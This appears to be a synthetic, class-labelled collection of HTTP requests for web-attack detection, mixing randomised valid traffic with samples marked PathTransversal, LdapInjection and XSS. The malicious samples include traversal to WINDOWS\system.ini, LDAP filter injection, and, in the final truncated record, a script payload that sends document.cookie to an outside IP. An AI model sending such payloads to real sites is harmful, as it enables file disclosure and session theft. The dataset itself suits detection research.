TE: deflate
User-Agent: q3@m8vL http://www.emaer.uk
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color16
Via: HTTP/4.1 33.33.241.115, 4reics/4.7 169.128.135.241
Transfer-Encoding: lnstnn; nMnnildY=nt3Ef
Upgrade: ruakde/7.8
X-Forwarded-For: 164.96.232.179
----: ----------------------

ti=1143&tneaPrydsd9Tgv=sihrejmNxs0o&lpaah6nlubbu3=oVnHFx2PGVTd&tlwsdaFuSobmat=90957&dbtjuHAs=0lkkUs&nomeRr1n2Rmes= dlikeagroup byr $eMinntkan7&ncsjro=Qhrwherercp4 hn4dy7:

End - Id: 43644
Start - Id: 45374
class: PathTransversal
POST /1yy0XgCfT@c@REr/s2Cdshnr90/NOhome425-KIupdateH1xi5/srgAiOEv6.9WUiF/es3IOoHZfOqBT/hh_mNMWj/i5.jpg? HTTP/1.1
Content-Length: 293
Content-Language: cileeh56,lilaod
Content-Encoding: deflate
Content-Location: /uzft0e/q4Osn/qgohee/rudrqke.pl
Content-MD5: QXNzMDFFcWF4bTRvZXNuOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 May 04 04:57:24 GMT
Last-Modified: Mon, 08 May 06 13:26:31 GMT
Host: www.arel.fr:2187
Connection: detct
Accept: text/xml;q=0.4
Accept-Charset: iso-8859-8-i;q=0.0, x-mac-icelandic;q=0.0, windows-1258;q=0.6, iso-8859-2;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 219.120.83.225
Cookie: cehjohyhOooh=7;Bha=eb9Q;diEn=928;rKGjoh=oepositionc;kork8Negoh0l=$ztl
Cookie2: $Version="96"
Date: Fri, 27 Aug 04 11:54:29 GMT
ETag: W/"@5U.o4KQGzYuXItRX"
Expect: 100-continue
From: R3loelSr@cnorhewh.st
If-Modified-Since: Sun, 26 Apr 09 02:03:38 GMT
If-Unmodified-Since: Wed, 27 Jun 07 18:46:59 UTC
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: "_6KX@XpcxoIZJoajb"
If-Range: Thu, 19 Mar 09 16:00:20 UTC
Max-Forwards: 0452
MIME-Version: 4.4
Pragma: eel='sy'
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: Digest opaque="exnaahng"
Range: 74377-10,-135
Referer: /ntopasei/Olbr/sgttEo.js
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (X11; U; Unix 8.9; to-aO; rv:5.0.9) Gecko/70513646
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: 1.0 40.146.129.164, FTP/3.4 3.243.189.169, ooe/1.3 33.111.197.167:3324
Transfer-Encoding: deflate
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9i=n6a4etua2s8Aaatsq&rilr=iro=achild&RErTinsert3s8zbgsound=815552&89NvS=63&tTmh=ssioTsdffsnRnck&rea6adndxz66s=udTith?h<n2execS&sP3iWSFAbk=Is&kKPopt=yoewink&fS50dP= bin&ebsniee= ?~o&Otra=)aiddvacdiv7idel(esg&rorestrdec=sVJSAPNn-s&t_fi6like=..\..\..\..\WINDOWS\system.ini

End - Id: 45374
Start - Id: 45766
class: PathTransversal
GET /4vwendxhfebymi/cVe/0lsdro/qAYiAwinntD/0rmcwKaccess_logPxDS_./s3/bobjectn0FtNhtaccestmp8TrpA/eWn6hFI/T5tmeieb7s/Dt5nha3iceh1Tbeh/epebiDEjiai/.mVv4iv.dll?jes6sc=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.1
Host: 163.116.251.91
Connection: indes
Accept: application/zip
Accept-Charset: shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 20.215.35.161
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Tue, 05 Jun 07 18:24:32 CET
ETag: W/"ZuCaxTopQAS6sIGZ4"
Expect: evdontue
From: dsxeHs@whobloehb.be
If-Modified-Since: Wed, 11 Mar 09 15:21:02 GMT
If-Unmodified-Since: Sat, 18 Apr 09 10:36:09 CET
If-Match: *
If-None-Match: *
If-Range: "pdwVr123vZIeXZeAbA"
Max-Forwards: 308
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: ehrxh feyrt=0igtd
Authorization: NTLM enJuM0xpaG5sc2Vnb25lT2hzemVlZmV0bmFyUjNhaGwzbHdmbHlz
Range: -500252,934-3694
Referer: /oszentu.gif
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 7.5; ve-an; rv:9.4.0) Gecko/49007526
UA-CPU: MIPS
UA-Disp: 517,832,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 9.4 236.146.42.68
Transfer-Encoding: compress
Upgrade: nnecre/6.0, mthEer/2.6, 07z/4.8, yHnm/7.3
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 217.11.93.180
X-Serial-Number: 5959177395
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45766
Start - Id: 23334
class: Valid
GET /cpKjEAyjXxtsvSK/iM@kCM/TtcoAICusr/mh.l6AEyNtAEcWx/iySejar5wpcar/eCS/9rL47EE_8/nlfrwwiTlezis7/NjieUHZJvdJzgo_/rUfUlsiggla3iAnspon/mluTg/c4lri.css?iirchmC8Sc=ee&ogxigeh=ukneitsdtplq&peHeen=xDowaaywaa20dop2n&ocia47hedN=eam&aeolyyoLi=2019432&un=m&tvEeu=mJQ3R1e4rE&4ulaae=owl6ita%40lue%3E6&2ttmlrLcmOssnar=1678849&wp-object2.sIQ8ncC=esrn2h4h+%28&IuRstmbmtnHon=375813 HTTP/1.0
Host: 20.174.8.112:80
Connection: close
Accept: application/postscript;q=0.6, video/mpeg;q=0.7, text/xml;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: asEae-oue;q=0.4, t4fal-ad, dse-0het;q=0.5, oljTbu-omj;q=0.6
Cache-Control: h=pEFnnsii
Client-ip: 222.151.220.198
Cookie: eHyaoEa1hhtt=5980;eNsteW=988794;xb.Tl8nPwindow.opendp=@d;Braopby=6733642
Cookie2: $Version="114"
Date: Sat, 15 Jan 05 10:31:15 CET
ETag: W/"ynrqS@txFebq1J5v8"
Expect: 100-continue
From: 2lbei@tdeem.org
If-Modified-Since: Mon, 04 Aug 08 12:22:29 GMT
If-Unmodified-Since: Wed, 30 Jul 08 18:38:39 CET
If-Match: *
If-None-Match: *
If-Range: "i7TQvnTlR0q9BZ6pl"
Max-Forwards: 2
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: NTLM YmJlNGNiREdnYVcyZVpzbGl0bnp1NmtjZ2xpbW9pZTJUbQ==
Range: 56641-,-4,2-
Referer: http://sR5sAY.de/tepes/rbrohoh/yklrmt.htm
TE: chunked
Trailer: Warning
User-Agent: Mozilla/6.7 (X11; U; Solaris 6.9; ee-sr; rv:3.2.3) Gecko/13025551
UA-CPU: Sparc
UA-Disp: 295,003,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 229x4077
Via: FTP/7.9 116.208.197.65
Transfer-Encoding: deflate
Upgrade: djbm1/8.1, yti/6.3, troL/1.6, aze4re/4.7
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 22361064185048
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23334
Start - Id: 10552
class: Valid
GET /sadminPGh3/HD2RcahYLTsamcmdLZ/p1abat2sasrr/6RhTBE2/ruRuUgNjkMbTJDcS_/0@vd9MAnvZdBrgVYmB/tc/an/jgplibautoexec/r8glnOnuy7as/ah7QlFc/xpD4BZsIe.htm? HTTP/1.0
Host: 29.147.11.4
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-5, windows-1250;q=0.6, iso-8859-5;q=0.6, isiri-3342;q=0.8, iso-8859-4;q=0.4
Accept-Encoding: gzip;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 89.233.229.175
Cookie: cedRHua8hD=616278;tsd3i2=e3t;dam9nxr9= wnsnz 0 s
Cookie2: $Version="06"
Date: Tue, 02 Sep 08 14:25:20 UTC
ETag: "CmmphlPXs7s7Y7VrxWY"
Expect: ih5D4t=coayeu
From: i5rsee@eomcf7fb.cz
If-Modified-Since: Thu, 03 Jun 04 15:33:39 GMT
If-Unmodified-Since: Sat, 18 Dec 04 24:56:27 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Jan 04 22:23:09 UTC
Max-Forwards: 51
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Ithc Ynijwra=smrinc
Authorization: NTLM d2ViZGNiZW9peHltbHo3NHhzY3RvZ3JFRWVhYWRpZ2V5b2FzOQ==
Range: -028
Referer: /xn5cp/eok7it/4eae.bin
TE: gzip
Trailer: Date
User-Agent: lwsEtalEncia4h
UA-CPU: MIPS
UA-Disp: 7913,7267,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: FTP/6.2 81.11.136.57, HTTP/4.7 238.85.234.196
Transfer-Encoding: compress
Upgrade: aianh/8.9, rdvq9p/7.9, srh/6.2
Warning: 970 239.131.64.210 "rDauEepHyyetKrx" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 72395720
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10552
Start - Id: 37337
class: LdapInjection
GET /ejeaptd/aUux@/9.WYIUdAqvR.aspx?twneobshaca=SM&esf0c41vaedw=e3WF8B HTTP/1.0
Host: www.stpdtIoCK.st:16
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, deflate, identity;q=0.4, compress;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 131.232.136.148
Cookie: amoic99itde2=IaeRe2Zm&;ishx=trfb$;N0T3itetkythfo=oahirll+;4p8se1meedi=&
Cookie2: $Version="4"
Date: Wed, 01 Feb 06 21:32:21 CET
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: ddtp@lesT.org
If-Modified-Since: Mon, 27 Sep 04 19:56:44 GMT
If-Unmodified-Since: Wed, 15 Sep 04 20:55:09 CET
If-Match: *
If-None-Match: *
If-Range: "6xH2@5W0ssXsZjhHKQV"
Max-Forwards: 92
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: leaN5 tobtnry7=2diiyo
Range: 54145-,-678850
Referer: /udpn1/nleDnowd/cl4dpabt/ah9Ao.msf
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: jbhr)(&(objectClass=    qh*)
UA-CPU: 68000
UA-Disp: 915,366,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: 5.9 www.iesZ.htm, 1.9 www.tdnipinn.css:395
Transfer-Encoding: identity
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37337
Start - Id: 9884
class: Valid
GET /as/2kcatone/izh2BMT-q/ctnemipsgidt/akLVtT1AmVp/gCFgRsfo9h6W.cfm?zuPolgoset=o2T&tNsHzSIkmvY7=76&gmteeecborCxlo5=848805&ooufmkMeEci=nnEsn&y0=lyW6gCKh&noAraoafcs=maily&nulliytWW3et9g=++o8location%3F%3Es&eceKTln22o=aguohaq&0utld382ac1t=92&ibaEeej0=iwie0hydN0asanaehv&1.yP=0278595&gcD=fGNhittx6ed&96S0enrsterei=5177 HTTP/1.1
Host: 52.233.24.169
Connection: oEpwhn
Accept: audio/*;q=0.5
Accept-Charset: iso-8859-9;q=0.6, iso-8859-7
Accept-Encoding: gzip;q=0.2
Accept-Language: *
Cache-Control: max-age=39692
Client-ip: 60.255.0.254
Cookie: fbsTie6mt=19;rl=openhii8whfO;otmpXa=linko
Cookie2: $Version="8"
Date: Fri, 09 Nov 07 12:08:13 GMT
ETag: "pQ0Csa_mPxVC_N2B9LUm"
Expect: 100-continue
From: vtou@ndnw.net
If-Modified-Since: Sun, 18 May 08 22:02:09 UTC
If-Unmodified-Since: Tue, 17 Nov 09 10:54:08 CET
If-Match: "vx32EqNzXR4.@IhWQf9"
If-None-Match: "skQFmpx5NMFJJnKP"
If-Range: Wed, 24 Oct 07 03:23:43 CET
Max-Forwards: 185
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic eWZhbTp0dXRoNjU=
Authorization: Digest response="8E14937E2cA8d70470EdAb3B4C1ECE38"
Range: -41393,134251-41032
Referer: http://9xtzesnO.cz/tgwo/lDei/oixo.tiff
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 7.9; Re-y8; rv:4.1.3) Gecko/47733179
UA-CPU: PowerPC
UA-Disp: 042,750,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4156x0641
Via: 0.7 www.Ytsptt.css
Transfer-Encoding: compress
Upgrade: nng/1.2, rrve/4.9, iogns/6.7, qipf/8.8
Warning: 400 www.satoatm.gif "qstaeInaenai" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 278768
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9884
Start - Id: 6142
class: Valid
POST /tBSu6669.oakaU.@J/irhs8eiiy/tsoutr/7lteno1nin.html? HTTP/1.1
Content-Length: 292
Content-Language: 6dtklsse,3llwhpaf,t
Content-Encoding: gzip
Content-Location: /fn8nwro/clsm/Sylh/sndauo/d0hhrx.rar
Content-MD5: NGxlZU9nMnBkT2FleXJzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Nov 08 18:04:03 CET
Last-Modified: Wed, 06 Jul 05 14:30:36 UTC
Host: www.6mYa.ch:19973
Connection: 9a8Sxh4
Accept: audio/*;q=0.2, video/quicktime, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: ox3eAr-n;q=0.3, 9ttgse-e;q=0.8, ybloh-pss;q=0.4, Tc-tt;q=0.2, n-gSg2e;q=0.8
Cache-Control: lea9rdh=solasQhi
Client-ip: 213.36.197.19
Cookie: ia2nr32tdssmy=3;tsensarajoos=wwrr?;toyus5O0huog=5133441;rls1Lrstrh=24819546;zreanN6hgyni=pokurWfokcna80Euf;Zet36=yteialotAvn
Cookie2: $Version="52"
Date: Thu, 01 Sep 05 06:08:18 UTC
ETag: "-1JU0w8x7nVeD3F"
Expect: meaF=Ewr0e;un9o=eexf1
From: arnac8@nERnnE.be
If-Modified-Since: Wed, 24 Mar 10 19:48:14 CET
If-Unmodified-Since: Thu, 27 Nov 08 21:31:48 GMT
If-Match: "T8f.ngLVsvzYE8u"
If-None-Match: *
If-Range: "NZ7J3R06wrSJJ6Y0BRJ"
Max-Forwards: 71
MIME-Version: 4.3
Pragma: asDAt2la='8ns'
Proxy-Authorization: Digest algorithm=cedo
Authorization: NTLM bmVjZWZsb290bGFpaGN2OWt1ZXJ1cG5kVHRyYWJmYXM5c3V1dG55aA==
Range: 611533-,1458-075
Referer: http://www.hlnaicm.net/bltiAi2/neca.txt
TE: gzip;q=0.6,deflate
Trailer: Upgrade
User-Agent: idoh/1.9.5
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 853x3655
Via: FTP/1.0 www.eicdws6t.shtml, 6cNY/4.4 26.158.95.194, FTP/7.6 228.132.199.103
Transfer-Encoding: deflate
Upgrade: pnds/8.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

RandSwkd=aWwz.YQ&_RQKkK=5718202&OcEw7U=825274&3sFG4Ea-=43802&gpimenlrrei=830&Emh.o9Aboot.ini=child6e([&cwmi6qfpHca=wgeted&nbahl8otadTtga=aahincluder&nwan=91416894&ertjrwdNhH=d>img)qmdelete4h fR&vfFJv.=rBF.&yricaeucT=e&oO=ls AidrsenmsocetcieoeE j&MOKB3.IcSCSc=8799522&ullo0wg=ocmdn09yl

End - Id: 6142
Start - Id: 37986
class: LdapInjection
GET /diw8azehctomium3/9C/atSlD.3N.Hb61G_W/azltau/CWCz/oyoe6dieoe/Sd5atfznlhptaxnepr/eheuteljore/ufonniut3raoB/tWZ/GrtsCuNesgsesmosqtk/eoGloeyacsoEsfwny.html?Nrozsdj=4848%29%28%26%28objectClass%3Dt1t%29%28%7C%28sn++%3D+l9%29%28cn%3Damp5+++J*%29%29&noss6omisn=hantF&PhDTautoexecYimgNrR0W=216 HTTP/1.0
Host: 65.112.73.204
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1252;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 181.41.234.72
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="76"
Date: Sun, 30 Aug 09 21:39:33 GMT
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Sat, 25 Jul 09 24:58:52 UTC
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: "ZxYGr-EE-ul2cKxlyV"
Max-Forwards: 80
MIME-Version: 4.1
Pragma: n='iteCc'
Proxy-Authorization: Digest nc=Fe26BDc0
Authorization: Basic RWJlbjppdGV0
Range: 4893-,-7197
Referer: http://www.aeal.be/ngti/7ahllomt.swf
TE: trailers,gzip
Trailer: Warning
User-Agent: Mozilla/8.1 (Windows; U; WinNT 4.9; or-9i; rv:7.9.2) Gecko/11920325
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: FTP/1.4 193.183.36.68, FTP/5.1 www.Irdjlph.jpg, 2.2 178.31.65.174
Transfer-Encoding: identity
Upgrade: ieu/6.3
Warning: 919 www.siLiann.jpg:37 "teLew" 
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37986
Start - Id: 12327
class: Valid
GET /jr9k/8IrJI-tMV2C.tiff?eriSjfqHzheg46i=7940&lnoe=3666&vzia=2aw7adna&8gW45ncux3@Ea=653&TNtrUebma=e&Tttnrsesnernrfh=6iHoin&8j=+o&t9=507&tRXvxEeoweJx=6947&aBdnghh=%7CoobaEcf%24Icca&rsul3naiOtnwutt=esX&dawEz=swredeohehesi2gala HTTP/1.1
Host: 67.223.138.212:97
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.2, compress, deflate
Accept-Language: zapefOSb-tlweens
Cache-Control: no-cache
Client-ip: 117.156.17.153
Cookie: mlLlhXriWauarne=leCw3
Cookie2: $Version="8"
Date: Wed, 20 Aug 08 20:53:57 CET
ETag: W/"0v-D@1MPy3dqaZ9lhM"
Expect: 100-continue
From: atRwrmd@teke.it
If-Modified-Since: Sun, 27 Aug 06 03:43:54 GMT
If-Unmodified-Since: Sun, 20 Jul 08 16:05:06 GMT
If-Match: "zry6AROWv5U6ykZP"
If-None-Match: "5GPMIc_r1PaVsNx4"
If-Range: Tue, 15 Dec 09 22:07:22 GMT
Max-Forwards: 72
MIME-Version: 1.6
Pragma: asm='3p6a'
Proxy-Authorization: toei iotvesT=unnlht
Authorization: txyemo tatuKtl=oestjae
Range: 951-7356,4576-927
Referer: http://www.sHtsQcV.org/e1addIe/seieAr.avi
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: 8Wmn1silh/2.0.3.9
UA-CPU: 68000
UA-Disp: 3555,603,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4392x5610
Via: e7reT/5.0 225.54.28.188:2, FTP/2.2 171.128.244.200, 2.0 www.xcbegxh.shtml
Transfer-Encoding: gzip
Upgrade: oebay/6.6, uooye/5.8
Warning: 291 www.sowd.html:096 "ebteyqufs" 
X-Forwarded-For: 105.219.52.42
X-Serial-Number: 7580317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12327
Start - Id: 32896
class: Valid
POST /fsahay9e1e/erT4P8vOvY/fwlOUNk/kaweh14d/u2K9ADrAnUukasbS/Mtei3TsesdbsilseOrd/f1kZ5-b0-dz/feV-fj@P/eOH3taisinhdYevHl/mLKlwjeqJ.nsf? HTTP/1.1
Content-Length: 77
Content-Language: aio,6neueU3m
Content-Encoding: identity
Content-Location: /qc2hoi/dasa.exe
Content-MD5: bnRlaXhleWFocm1wbXppYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Oct 09 14:42:06 GMT
Last-Modified: Mon, 08 May 06 04:02:28 UTC
Host: 186.60.64.246:80
Connection: hjnHtear
Accept: */*
Accept-Charset: cp-950, iso-8859-7, big5;q=0.8, iso-8859-1, euc-tw;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=63850
Client-ip: 223.203.207.16
Cookie: ayoressetcsm=rxv3
Cookie2: $Version="62"
Date: Wed, 16 Jul 08 17:17:56 UTC
ETag: "1UmVFxzuxmLpl7L.dksv"
Expect: pnte
From: Aecihs@arog1.org
If-Modified-Since: Mon, 05 Sep 05 13:50:18 CET
If-Unmodified-Since: Mon, 07 Mar 05 23:12:32 CET
If-Match: "YCLI-vL_SzzeeZSak"
If-None-Match: "aMwk8HlvBQnm2A417"
If-Range: Wed, 25 May 05 15:32:37 CET
Max-Forwards: 1
MIME-Version: 4.5
Pragma: gm='nhr'
Proxy-Authorization: Basic TklvdmI6bzFkYWE=
Authorization: NTLM eGJmdEdlZW5kc2h1aXB1Y2Vvamhud2VtVWFSZWFsYmdteWxlZQ==
Range: -11
Referer: /ygfgna.gif
TE: trailers,gzip,gzip;q=0.7
Trailer: If-Match
User-Agent: fgHi (akzyD0sqAe)
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 294x4012
Via: O9iazd/7.0 210.181.110.111, 2.6 233.71.194.100
Transfer-Encoding: gzip
Upgrade: nttueo/5.8, iHertn/7.7, edu/1.0
Warning: 596 14.200.193.188 "dxenEEo5vI6i" 
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 5090057683068397581
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gv7jtgnph-S=taiiBcoss  )b Ht5ha&h6cn2uetE1hdlnd=oanmSfimgqLscriptsed&gr=rez

End - Id: 32896
Start - Id: 7219
class: Valid
POST /xFCenvcxTNqwZ6/rEPR1V7IAcHHQ/Gj/unsheithRhhdfraEthy/puGA/tN/w4olJzuyqTc08vwc/253pO.mspx? HTTP/1.0
Content-Length: 169
Content-Language: d,nE,xwIhQres
Content-Encoding: compress
Content-Location: /SueUi/xevi/anlRst/eilrf/pvStcje.jsp
Content-MD5: Ym9ldWhvZmVjMGg4N2thdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Aug 08 11:52:58 GMT
Last-Modified: Sun, 24 Feb 08 19:20:28 CET
Host: 163.220.179.169
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress
Accept-Language: sstaro-aksehb, lAue-usbbadg;q=0.4, niowea-a
Cache-Control: min-fresh=91242
Client-ip: 80.70.236.10
Cookie: eAaoo0i0cbsu=874;he=cH: elmrfelh@;8tbrsO=EBbhzitE;ng=92;taO3raa3hrfm= ozexecdo2r p:3asmi
Cookie2: $Version="296"
Date: Wed, 18 Nov 09 11:52:49 GMT
ETag: "Rwm_MIb0XCKapKG6"
Expect: 100-continue
From: 9End@aiod4fee.uk
If-Modified-Since: Tue, 28 Nov 06 05:00:53 CET
If-Unmodified-Since: Thu, 26 Mar 09 18:08:37 GMT
If-Match: *
If-None-Match: "ZT.LwGwY9r2pOtU6gjh"
If-Range: Sat, 08 Jan 05 20:56:53 GMT
Max-Forwards: 2557
MIME-Version: 6.6
Pragma: hwylr='q'
Proxy-Authorization: NTLM aHN3NHJ6aXRlc3RlaW9zdGliaHZlbnVvY29vb2VuOWFrQTVzbnhjbnNobnYw
Authorization: nlt3Oh 8issjt=tyseo
Range: 7717-
Referer: http://gSnafusn.com/lfni.mp3
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 0.9; eb-ah; rv:4.9.8) Gecko/54475465
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 629x010
Via: 6mp/5.6 www.rTrs.html
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 559 61.31.135.187 "11oa2Jyriolu0wwt" 
X-Forwarded-For: 94.164.69.87
X-Serial-Number: 35067124458
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6tou=2815917&dioorut3Wivzap=17713772&isehnfod=5soeeAy6aaoeapnt&rnotubnsrpTTh1=iorjsm3adminiwelqh$&r544ij=evMv&dau=teu&ad1aiit2e0snhi=301392&gaaiumosuiniert=c-6J@wd6b

End - Id: 7219
Start - Id: 9632
class: Valid
GET /ayeuotbeet7ji/mhmtiee/wC4wLwyd/len4rspi3Cteym.gif?xrnnacre=%24rs%3E&zScCRcj=0noi9acliailtruuee&utcfehwetAoo=fYnasnr2fh1hdt&krkhTtbTge=Whn&el=in%2Biosystemn%2F4%7Einserteug%3Ca6&sncitfnmtyo=miilt3ii%3EH4hrlrin&tUO=nPeo%27imnhlrT&rAXxc1vSW0=dw&j1aznEtdi=04446&-M91metaTL=ra&0Ibdhptrw=n1cc&beeoe1h4ood8=dbsG3&HGiCd3=eejnT HTTP/1.1
Host: www.eesrao.uk
Connection: to0eoh
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.4, identity;q=0.2
Accept-Language: *;q=0.7
Cache-Control: min-fresh=01446
Client-ip: 120.240.123.192
Cookie: servicesOeTWnph-=ehreplacelee$urs%2qwane ;epdQha=uVeBSedrS9m;s1ythiseoxrtn=gSVybioro12
Cookie2: $Version="50"
Date: Sun, 19 Mar 06 06:49:59 GMT
ETag: W/"v0BkLYdVFlPVcZz0TT5"
Expect: n66hah
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Sun, 30 Sep 07 21:10:57 GMT
If-Unmodified-Since: Thu, 23 Apr 09 23:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Aug 08 19:58:35 CET
Max-Forwards: 2
MIME-Version: 3.3
Pragma: e='ofhM'
Proxy-Authorization: jyhe b0tkvyos=lioe3l1
Authorization: Basic dEdzbVczOm5Fbk90YW9h
Range: -11893
Referer: http://www.lyddz.com/orzaftk/Dbei5g/khoeo/ttwx8ni.msf
TE: chunked,deflate;q=0.0
Trailer: Host
User-Agent: Mozilla/2.0 (compatible; zeiev; Win 9x; Mssic; oe6co79le)
UA-CPU: PowerPC
UA-Disp: 8659,744,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9491x5662
Via: ci6/3.8 www.zea1TH.png:55692, FTP/2.6 190.147.21.82
Transfer-Encoding: identity
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 606 2.209.145.26 "hnYlolrdop5ncaorw1" "Wed, 04 May 05 03:28:44 GMT"
X-Forwarded-For: 34.115.88.196
X-Serial-Number: 04486
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9632
Start - Id: 47542
class: XSS
GET /ae5sf/hree4r/1aypzinttieeHte/65C_UtzQI7.7Wj.jpg?aaet=ei%5C&cxycdN=%3A4&mct=i0ibin&re93J3lawgnrc1=l8aseilghdnodeplocationd%40mail%24&mlntipEebueszw=likctOr4o7rioan5i5&ued=iconnecti&oca=ldticXirs+e&o2e=Wdtmp&tAr=1onu&HSnq=66953&uinlnlohmh=erstcwt&istbmw=%26%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F25.197.236.246%2Fnsonto.mdb%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&dQbstomann8dyI1=038&u7hT=bhgc+8fiop%3Ehaving&80xPI@MrC2-5=s HTTP/1.0
Host: www.ossaaT.de
Connection: ftile9R
Accept: */*;q=0.9
